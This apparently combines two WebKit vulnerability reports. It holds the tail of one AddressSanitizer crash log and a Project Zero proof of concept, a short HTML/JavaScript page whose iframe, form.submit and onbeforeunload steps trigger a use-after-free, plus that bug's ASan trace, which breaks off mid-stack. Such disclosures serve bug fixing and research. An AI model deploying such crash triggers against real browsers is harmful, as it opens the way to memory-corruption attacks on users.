#0 0x111d32294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)
#1 0x122c0e650 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72650)
#2 0x114db0a77 in WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::expandCapacity(unsigned long, WebCore::FormAssociatedElement**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd78a77)
#3 0x114dad5cf in void WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::insert<WebCore::FormAssociatedElement*&>(unsigned long, WebCore::FormAssociatedElement*&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd755cf)
#4 0x114dad43f in WebCore::HTMLFormElement::registerFormElement(WebCore::FormAssociatedElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd7543f)
#5 0x114b20fd8 in WebCore::FormAssociatedElement::setForm(WebCore::HTMLFormElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xae8fd8)
#6 0x114b2196e in WebCore::FormAssociatedElement::resetFormOwner() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xae996e)
#7 0x114dcbe6d in WebCore::HTMLInputElement::finishedInsertingSubtree() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd93e6d)
#8 0x114404e08 in WebCore::ContainerNode::notifyChildInserted(WebCore::Node&, WebCore::ContainerNode::ChildChange const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3cce08)
#9 0x1144049a2 in WebCore::ContainerNode::updateTreeAfterInsertion(WebCore::Node&, WebCore::ContainerNode::ReplacedAllChildren) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3cc9a2)
#10 0x1144042ba in WebCore::ContainerNode::appendChildWithoutPreInsertionValidityCheck(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3cc2ba)
#11 0x1144072f8 in WebCore::ContainerNode::appendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3cf2f8)
#12 0x1163be49d in WebCore::Node::appendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x238649d)
#13 0x115a321e6 in WebCore::jsNodePrototypeFunctionAppendChildBody(JSC::ExecState*, WebCore::JSNode*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19fa1e6)
#14 0x115a2c648 in long long WebCore::IDLOperation<WebCore::JSNode>::call<&(WebCore::jsNodePrototypeFunctionAppendChildBody(JSC::ExecState*, WebCore::JSNode*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19f4648)
#15 0x354389601027 (<unknown module>)
#16 0x122546dd7 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aadd7)
#17 0x122546e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49)
#18 0x12253ff6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f)
#19 0x1221a3847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847)
#20 0x12212488a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a)
#21 0x12173d731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731)
#22 0x12173d9a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2)
#23 0x12173dd13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13)
#24 0x115276615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615)
#25 0x1156896cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd)
#26 0x1149f5010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010)
#27 0x1149f4ae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0)
#28 0x1149bcb97 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x984b97)
#29 0x1149bdbde in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x985bde)
previously allocated by thread T0 here:
#0 0x111d31d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)
#1 0x7fffa1ed8281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)
#2 0x122c0ead4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4)
#3 0x122c0cd6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d)
#4 0x122b93247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247)
#5 0x122b9263a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a)
#6 0x114d97a90 in WTF::VectorBufferBase<WebCore::FormAssociatedElement*>::allocateBuffer(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd5fa90)
#7 0x114d97df3 in WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::reserveCapacity(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd5fdf3)
#8 0x114db0a77 in WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::expandCapacity(unsigned long, WebCore::FormAssociatedElement**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd78a77)
#9 0x114dad5cf in void WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::insert<WebCore::FormAssociatedElement*&>(unsigned long, WebCore::FormAssociatedElement*&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd755cf)
#10 0x114dad43f in WebCore::HTMLFormElement::registerFormElement(WebCore::FormAssociatedElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd7543f)
#11 0x114b20fd8 in WebCore::FormAssociatedElement::setForm(WebCore::HTMLFormElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xae8fd8)
#12 0x114b212d3 in WebCore::FormAssociatedElement::insertedInto(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xae92d3)
#13 0x114d9f8b0 in WebCore::HTMLFormControlElement::insertedInto(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd678b0)
#14 0x114e80f59 in WebCore::HTMLTextFormControlElement::insertedInto(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe48f59)
#15 0x114416e68 in WebCore::notifyNodeInsertedIntoDocument(WebCore::ContainerNode&, WebCore::Node&, WTF::Vector<WTF::Ref<WebCore::Node>, 11ul, WTF::CrashOnOverflow, 16ul>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3dee68)
#16 0x114416cad in WebCore::notifyChildNodeInserted(WebCore::ContainerNode&, WebCore::Node&, WTF::Vector<WTF::Ref<WebCore::Node>, 11ul, WTF::CrashOnOverflow, 16ul>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3decad)
#17 0x114404d67 in WebCore::ContainerNode::notifyChildInserted(WebCore::Node&, WebCore::ContainerNode::ChildChange const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3ccd67)
#18 0x114403396 in WebCore::ContainerNode::parserAppendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3cb396)
#19 0x114d4acdc in WebCore::executeInsertTask(WebCore::HTMLConstructionSiteTask&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd12cdc)
#20 0x114d43ea7 in WebCore::HTMLConstructionSite::executeQueuedTasks() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd0bea7)
#21 0x114d73c8a in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3bc8a)
#22 0x114d73849 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3b849)
#23 0x114d729c2 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3a9c2)
#24 0x114d744e8 in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3c4e8)
#25 0x114752531 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x71a531)
#26 0x11488f63d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x85763d)
#27 0x114850736 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x818736)
#28 0x1142cc047 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294047)
#29 0x1142c4df1 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28cdf1)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb3749b) in WebCore::FormSubmission::create(WebCore::HTMLFormElement&, WebCore::FormSubmission::Attributes const&, WebCore::Event*, WebCore::LockHistory, WebCore::FormSubmissionTrigger)
Shadow bytes around the buggy address:
0x1c18000172b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c18000172c0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x1c18000172d0: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
0x1c18000172e0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x1c18000172f0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
=>0x1c1800017300: fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c1800017310: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c1800017320: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
0x1c1800017330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1c1800017340: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c1800017350: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==934==ABORTING
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1353
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.
PoC:
=================================================================
-->
<script>
function go() {
iframe.name = "foo";
var form = document.createElement("form");
iframe.src = "data:text/html,foo";
form.submit();
window.onbeforeunload = f;
}
function f() {
document.head.appendChild(del);
}
</script>
<body onload=go()>
<del id="del">
<iframe id="iframe"></iframe>
<!--
=================================================================
ASan log:
=================================================================
==689==ERROR: AddressSanitizer: heap-use-after-free on address 0x6110000889c8 at pc 0x000114c94a57 bp 0x7fff4fc33210 sp 0x7fff4fc33208
READ of size 8 at 0x6110000889c8 thread T0
==689==WARNING: invalid path to external symbolizer!
==689==WARNING: Failed to use and restart external symbolizer!
#0 0x114c94a56 in WTF::UniqueRef<WebCore::FrameLoader>::get() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x45a56)
#1 0x1154657ad in WebCore::DocumentLoader::frameLoader() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8167ad)
#2 0x115466208 in WebCore::DocumentLoader::mainReceivedError(WebCore::ResourceError const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x817208)
#3 0x1154672cc in WebCore::DocumentLoader::cancelMainResourceLoad(WebCore::ResourceError const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8182cc)
#4 0x115469d2b in WebCore::DocumentLoader::stopLoadingForPolicyChange() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x81ad2b)
#5 0x11546a995 in WebCore::DocumentLoader::continueAfterContentPolicy(WebCore::PolicyAction) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x81b995)
#6 0x1108c81b5 in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForResponse(WebCore::ResourceResponse const&, WebCore::ResourceRequest const&, WTF::Function<void (WebCore::PolicyAction)>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x77e1b5)
#7 0x115468e8a in WebCore::DocumentLoader::responseReceived(WebCore::ResourceResponse const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x819e8a)
#8 0x114edcdb7 in WebCore::CachedRawResource::responseReceived(WebCore::ResourceResponse const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28ddb7)
#9 0x1179b42a2 in WebCore::SubresourceLoader::didReceiveResponse(WebCore::ResourceResponse const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d652a2)
#10 0x1175da5da in auto WebCore::ResourceLoader::loadDataURL()::$_0::operator()<std::optional<WebCore::DataURLDecoder::Result> >(std::optional<WebCore::DataURLDecoder::Result>) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x298b5da)
#11 0x1175d9fba in WTF::Function<void (std::optional<WebCore::DataURLDecoder::Result>)>::CallableWrapper<WebCore::ResourceLoader::loadDataURL()::$_0>::call(std::optional<WebCore::DataURLDecoder::Result>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x298afba)
#12 0x11535729a in WTF::Function<void (std::optional<WebCore::DataURLDecoder::Result>)>::operator()(std::optional<WebCore::DataURLDecoder::Result>) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x70829a)
#13 0x11535709b in WebCore::DataURLDecoder::DecodingResultDispatcher::timerFired() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x70809b)
#14 0x1237d767d in WTF::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d2467d)
#15 0x7fff8c5dfc53 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90c53)
#16 0x7fff8c5df8de in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x908de)
#17 0x7fff8c5df439 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90439)
#18 0x7fff8c5d6b80 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87b80)
#19 0x7fff8c5d6113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113)
#20 0x7fff8bb36ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
#21 0x7fff8bb36cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
#22 0x7fff8bb36b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
#23 0x7fff8a0cfa53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53)
#24 0x7fff8a84b7ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed)
#25 0x7fff8a0c43da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da)
#26 0x7fff8a08ee0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d)
#27 0x7fffa1faf8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
#28 0x7fffa1fae2e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)
#29 0x10ffc956c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)
#30 0x7fffa1d56234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)
0x6110000889c8 is located 136 bytes inside of 240-byte region [0x611000088940,0x611000088a30)
freed by thread T0 here:
#0 0x113395294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)
#1 0x123825650 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72650)
#2 0x11550fb0e in WTF::RefPtr<WebCore::Frame>::operator=(std::nullptr_t) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8c0b0e)
#3 0x1175d56e9 in WebCore::ResourceLoader::releaseResources() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29866e9)
#4 0x1175d882c in WebCore::ResourceLoader::cancel(WebCore::ResourceError const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x298982c)
#5 0x1154672b9 in WebCore::DocumentLoader::cancelMainResourceLoad(WebCore::ResourceError const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8182b9)
#6 0x115469d2b in WebCore::DocumentLoader::stopLoadingForPolicyChange() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x81ad2b)
#7 0x11546a995 in WebCore::DocumentLoader::continueAfterContentPolicy(WebCore::PolicyAction) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x81b995)
#8 0x1108c81b5 in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForResponse(WebCore::ResourceResponse const&, WebCore::ResourceRequest const&, WTF::Function<void (WebCore::PolicyAction)>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x77e1b5)
#9 0x115468e8a in WebCore::DocumentLoader::responseReceived(WebCore::ResourceResponse const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x819e8a)
#10 0x114edcdb7 in WebCore::CachedRawResource::responseReceived(WebCore::ResourceResponse const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28ddb7)
#11 0x1179b42a2 in WebCore::SubresourceLoader::didReceiveResponse(WebCore::ResourceResponse const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d652a2)
#12 0x1175da5da in auto WebCore::ResourceLoader::loadDataURL()::$_0::operator()<std::optional<WebCore::DataURLDecoder::Result> >(std::optional<WebCore::DataURLDecoder::Result>) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x298b5da)
#13 0x1175d9fba in WTF::Function<void (std::optional<WebCore::DataURLDecoder::Result>)>::CallableWrapper<WebCore::ResourceLoader::loadDataURL()::$_0>::call(std::optional<WebCore::DataURLDecoder::Result>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x298afba)
#14 0x11535729a in WTF::Function<void (std::optional<WebCore::DataURLDecoder::Result>)>::operator()(std::optional<WebCore::DataURLDecoder::Result>) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x70829a)
#15 0x11535709b in WebCore::DataURLDecoder::DecodingResultDispatcher::timerFired() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x70809b)
#16 0x1237d767d in WTF::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d2467d)
#17 0x7fff8c5dfc53 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90c53)
#18 0x7fff8c5df8de in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x908de)
#19 0x7fff8c5df439 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90439)
#20 0x7fff8c5d6b80 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87b80)
#21 0x7fff8c5d6113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113)
#22 0x7fff8bb36ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
#23 0x7fff8bb36cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
#24 0x7fff8bb36b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
#25 0x7fff8a0cfa53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53)
#26 0x7fff8a84b7ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed)
#27 0x7fff8a0c43da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da)
#28 0x7fff8a08ee0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d)
#29 0x7fffa1faf8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
previously allocated by thread T0 here:
#0 0x113394d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)
#1 0x7fffa1ed8281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)
#2 0x123825ad4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4)
